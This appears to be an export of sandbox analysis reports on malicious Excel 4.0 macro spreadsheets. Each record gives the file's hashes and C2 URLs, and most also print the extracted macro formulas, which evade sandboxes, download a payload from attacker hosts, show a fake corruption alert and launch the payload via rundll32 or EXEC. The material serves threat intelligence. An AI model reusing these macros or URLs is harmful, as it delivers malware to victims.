{"version":"0.2","sample":{"sample":"","kind":"file","target":"47ef346b74a85f5983e70e25b1348193fbca0a8c27556704adbd2340f727bc9d"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"47ef346b74a85f5983e70e25b1348193fbca0a8c27556704adbd2340f727bc9d","filesize":152576,"md5":"ab40a8e415c334d3216ca6d52066f45a","sha1":"8a835087ffa5c21d5d8192cf5d048da284ee98fa","sha256":"47ef346b74a85f5983e70e25b1348193fbca0a8c27556704adbd2340f727bc9d","sha512":"3acb17e380ce6442b1f31eedcbfaad271a1fe925b50fd45470347622765a15ea69401665f3885330704370534caae28ff5e5eb453d1f72fda73fe4583b643b8e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"47ef346b74a85f5983e70e25b1348193fbca0a8c27556704adbd2340f727bc9d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZbE8vfHBRi\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"47fa8b9cdb534a99a825c21499a25743f319ed93294612ab2922eff396bd3cc0"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"47fa8b9cdb534a99a825c21499a25743f319ed93294612ab2922eff396bd3cc0","filesize":170496,"md5":"9f6ac6065a8214436e4e602f8afb2ebb","sha1":"f9d56f16c14e8c0d904082afacfef4c05a25fb44","sha256":"47fa8b9cdb534a99a825c21499a25743f319ed93294612ab2922eff396bd3cc0","sha512":"6f94cbe9a98f881b6fe276f3b0c2cb82cb56df2efd9cfcfa85a0ccb4a8265d626bf9544ccfa15588000ffec9e32e4883896bf100504d869b4a0d88f891ad7f74","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"47fa8b9cdb534a99a825c21499a25743f319ed93294612ab2922eff396bd3cc0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jMCXmh1CFD\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"480499db13b76ced05af7f3e0a16cebaf017faa8b6adf9073ed6e27c9d7b54ad"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"480499db13b76ced05af7f3e0a16cebaf017faa8b6adf9073ed6e27c9d7b54ad","filesize":120320,"md5":"cfaa208c989ca56df9832a971ba2cce2","sha1":"3348febe0d50579bd70e9f25f1a3fbf08e9d0b1a","sha256":"480499db13b76ced05af7f3e0a16cebaf017faa8b6adf9073ed6e27c9d7b54ad","sha512":"86253379aa90ac6c2a19c11bf5ba14341dff4072aa8e2aaa2701440ca7e847049eeb9237032b3b6409adcfe268998a4fb2d4b4b6802457de540e9a889baf3003","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"480499db13b76ced05af7f3e0a16cebaf017faa8b6adf9073ed6e27c9d7b54ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"POHLK9WO9J\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4829709f4aad8d1caf9e1c3cfabd35bbd4227148075166298e2fd5caf589a6f9"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"4829709f4aad8d1caf9e1c3cfabd35bbd4227148075166298e2fd5caf589a6f9","filesize":144384,"md5":"07edd1ef0d13ff47f54ea96430eac9fa","sha1":"e3642060f3db450f0dcd9be3c537e5dda160e777","sha256":"4829709f4aad8d1caf9e1c3cfabd35bbd4227148075166298e2fd5caf589a6f9","sha512":"883ed8a7838f5151422b173e44b640d8a6cd9021aaf7d64dbc4d587e65a254ed7f401930ff8a919145d6311aa531ce1892c71dc61d1d931fb3d1759bafe0d67e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4829709f4aad8d1caf9e1c3cfabd35bbd4227148075166298e2fd5caf589a6f9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"eFUTgIxyce\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"482b33a1a8cf249016a8a25dd11438b676106ec2c8a9e69ba977520b8d14a84f"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"482b33a1a8cf249016a8a25dd11438b676106ec2c8a9e69ba977520b8d14a84f","filesize":160768,"md5":"2c33b7df10fa1ba57bbc26499c1be8c8","sha1":"53e1b815b48e6c7942eac16a8998b019350fa2db","sha256":"482b33a1a8cf249016a8a25dd11438b676106ec2c8a9e69ba977520b8d14a84f","sha512":"2f163faf888416b7084a41f922e3a2629afebb325dce811ea7b2a8c484b50b57520cb6ab94759bfd5cf886ceeeed7aebfdbfb7a0bedf678e8c34dbd17515c31e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"482b33a1a8cf249016a8a25dd11438b676106ec2c8a9e69ba977520b8d14a84f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KXT83mhpxT\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"487e2df551c88580125a0befa37dd5dff428ced3f9568c5fc14f1ee5b25695a2"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"487e2df551c88580125a0befa37dd5dff428ced3f9568c5fc14f1ee5b25695a2","filesize":185344,"md5":"5af222e22ec98f203b78def7e95c58dd","sha1":"e2802e46a95a053df320853ea9d990984c8cb687","sha256":"487e2df551c88580125a0befa37dd5dff428ced3f9568c5fc14f1ee5b25695a2","sha512":"788fdd50561b66a2ba5ebf4ab0ceacdbfc711d8e3b54b212b67b3d6025639735a2a23f61e7417ca7ed97bda922cb4d68e9a5867a36580dfa43e0f403a364c7d5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"487e2df551c88580125a0befa37dd5dff428ced3f9568c5fc14f1ee5b25695a2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4889097ed25e0c7e19c24e9c54d0114e73bd02dadca224a174500c6b8fa05498"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"4889097ed25e0c7e19c24e9c54d0114e73bd02dadca224a174500c6b8fa05498","filesize":160768,"md5":"ae9ca74025df0a8eaf5a8f61db2fea59","sha1":"d1516d414cd769dad8f155e77eaebf213de45572","sha256":"4889097ed25e0c7e19c24e9c54d0114e73bd02dadca224a174500c6b8fa05498","sha512":"7fd61a5764cc087a8b5fdae9763d59217d78706e2e6e8780d198d8c12343a856afec7c00e8d3d2b1fac73fb2346e441760ba3ee4a4fcdd8a4c301723aa5cea1b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4889097ed25e0c7e19c24e9c54d0114e73bd02dadca224a174500c6b8fa05498.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cfPzRyxYkE\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"489302cc969d825b416f47a50b995e382f639cdea5b4b90e9619abb623fd072e"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"489302cc969d825b416f47a50b995e382f639cdea5b4b90e9619abb623fd072e","filesize":206336,"md5":"8d451945e5254e56e89d17a5af1b805c","sha1":"91a51a42a5bb50e3acc1ed3d0b963db09e72fa46","sha256":"489302cc969d825b416f47a50b995e382f639cdea5b4b90e9619abb623fd072e","sha512":"1725e587afd13eb778249c1b6dc8826c5b22a395d2e2aec8943ea5dd6d8864cca651ea795b5189abe331850b69113274d316c4075dfa6341437566883bb0a208","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"489302cc969d825b416f47a50b995e382f639cdea5b4b90e9619abb623fd072e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"anIXARz2xz\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4894e27f9d31bcffa8cdbce4eade1ca48bc53ff838a702992ad6ec6220e38e8c"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"4894e27f9d31bcffa8cdbce4eade1ca48bc53ff838a702992ad6ec6220e38e8c","filesize":113664,"md5":"0d095c04544ccd9ac8117b9ffd758c81","sha1":"dae54f29ee59b904c9678e52f96357927a47c374","sha256":"4894e27f9d31bcffa8cdbce4eade1ca48bc53ff838a702992ad6ec6220e38e8c","sha512":"fa634b586510f0703bed60f9864d02e08ad9d950c1a0029744bb8deda054be8932a76a85fc1a955a480f69df8f3a1914b9ad9ac29ec4ca45d646da9378d84d0d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4894e27f9d31bcffa8cdbce4eade1ca48bc53ff838a702992ad6ec6220e38e8c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VS4RioIY4V\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4899d5ad58ee01e0fca93fbc7f48fbc9f1136195c63fc26549a678386a594fcf"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"4899d5ad58ee01e0fca93fbc7f48fbc9f1136195c63fc26549a678386a594fcf","filesize":112128,"md5":"5882471498402272898ee187db1211ea","sha1":"01cd7eecddd42022daad7f1146c2d5aa928a8464","sha256":"4899d5ad58ee01e0fca93fbc7f48fbc9f1136195c63fc26549a678386a594fcf","sha512":"b6f245ba2cfa117f43a0277c1aabe390444473af1dc60d3c494dab913920337506a15ed5ae684b7d6b0cf344f7883980c2f507c547c1c18fa623822765875fff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4899d5ad58ee01e0fca93fbc7f48fbc9f1136195c63fc26549a678386a594fcf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"48a7756450b0376170edc0003ef6dc8ed3c2976d258be45bf4dec0492318bad4"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"48a7756450b0376170edc0003ef6dc8ed3c2976d258be45bf4dec0492318bad4","filesize":103941,"md5":"60c431da0ce4ed2c49c3acddbe766dcf","sha1":"b4891f3a6936ac781a7bbb0e1dd02b419f38e543","sha256":"48a7756450b0376170edc0003ef6dc8ed3c2976d258be45bf4dec0492318bad4","sha512":"3b0e64133d12f727f89f89e34b067f9012bf0d21d2ab38811e3c71bc3aff1ac1c36f587b350eac54afc7deb90a35424c1be63306207dd9db6dd37cb6fb8aa6c6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"48a7756450b0376170edc0003ef6dc8ed3c2976d258be45bf4dec0492318bad4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"48b1f379e79bbc355d69fd8f11e9329f680263b15f40be89fdaa9f3d644f3a33"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"48b1f379e79bbc355d69fd8f11e9329f680263b15f40be89fdaa9f3d644f3a33","filesize":182784,"md5":"15dd4590120c04540db2f139f47bd3a7","sha1":"a7897620d0ac5944dbe805a04bc72ab8af61acb5","sha256":"48b1f379e79bbc355d69fd8f11e9329f680263b15f40be89fdaa9f3d644f3a33","sha512":"d337b3b4dde6bf04bfeac1374accc16bdcbb3936bc65646fe367bc696e5c267d0de15bc43bf6e504d6aefa834381f48392d8904841f823d9f84fb7675d72781f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"48b1f379e79bbc355d69fd8f11e9329f680263b15f40be89fdaa9f3d644f3a33.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"48b3ab8e428346b86339f3e28e119ad314195b2ad22e5fb8b4b9c116874dd846"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"48b3ab8e428346b86339f3e28e119ad314195b2ad22e5fb8b4b9c116874dd846","filesize":193536,"md5":"71f4aeddec4efe9de7e297c23a228428","sha1":"79c245f9194f316935a4e47eb1bd149fc13e55b3","sha256":"48b3ab8e428346b86339f3e28e119ad314195b2ad22e5fb8b4b9c116874dd846","sha512":"da7d4066ee3d41fa785704c94307d2b1a6615113c13450f12a71ce2634c6a991ae6253656e4b4df9fe64568a1b4d344c16ca4839483aa3d40b2ec6ae1b8cf88c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"48b3ab8e428346b86339f3e28e119ad314195b2ad22e5fb8b4b9c116874dd846.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/test"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"48c4d4d5db4cf06b2f59cad7d8469abd2af6f826e818c0d132626ff703ec8179"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"48c4d4d5db4cf06b2f59cad7d8469abd2af6f826e818c0d132626ff703ec8179","filesize":112640,"md5":"ab1b6e8367c3aa0c6396c36994438943","sha1":"abf443f29134cee79a020f397293dc8688395bf8","sha256":"48c4d4d5db4cf06b2f59cad7d8469abd2af6f826e818c0d132626ff703ec8179","sha512":"8b33548f95a3ce12a43d63f0b35ea2478a16febfdda092750018a99b2ca4733d6e5017d495c4e3fefcea62461d6b692268f44736e11001d46461c6fa17d3e7a6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"48c4d4d5db4cf06b2f59cad7d8469abd2af6f826e818c0d132626ff703ec8179.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"48d28f914e45cbea8171db274abd28e37bde15f5e53ea0955e68a138d30c598a"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"48d28f914e45cbea8171db274abd28e37bde15f5e53ea0955e68a138d30c598a","filesize":113664,"md5":"6a2e78913caf74c208ff4dd3f64b0eb9","sha1":"53b471c30a97201b6813f6f64123ad5fcd5f153f","sha256":"48d28f914e45cbea8171db274abd28e37bde15f5e53ea0955e68a138d30c598a","sha512":"d3659675151e45fba934b7c2a697b0eec6c09c9cf44ecf08075603e7e8a7926638afd81cc6ab6dd546fab51785485633d8bf359ddf0f5d9d7f4143f509919102","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"48d28f914e45cbea8171db274abd28e37bde15f5e53ea0955e68a138d30c598a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BESFtae640\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"48e00beabaab1f9e05597fb736873f22c978719199d8392685466670fda2b82f"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"48e00beabaab1f9e05597fb736873f22c978719199d8392685466670fda2b82f","filesize":170496,"md5":"dfd97ee304f7508d39325dfd057d46b3","sha1":"56fb7f228ebfd16b04ea13a2914cf5f7ba62eab4","sha256":"48e00beabaab1f9e05597fb736873f22c978719199d8392685466670fda2b82f","sha512":"b607c9197feace20a75273bc554fb0df2e575e9575a9567f8ea5e10c3039335a00d708decb69d3a6145c50caa6bdfc660f2c8abfd6760f21aa9ca6b57ab5db56","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"48e00beabaab1f9e05597fb736873f22c978719199d8392685466670fda2b82f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vzrKAqdfuz\",TRUE)\nGOTO(R$0C$19)"}}}]}
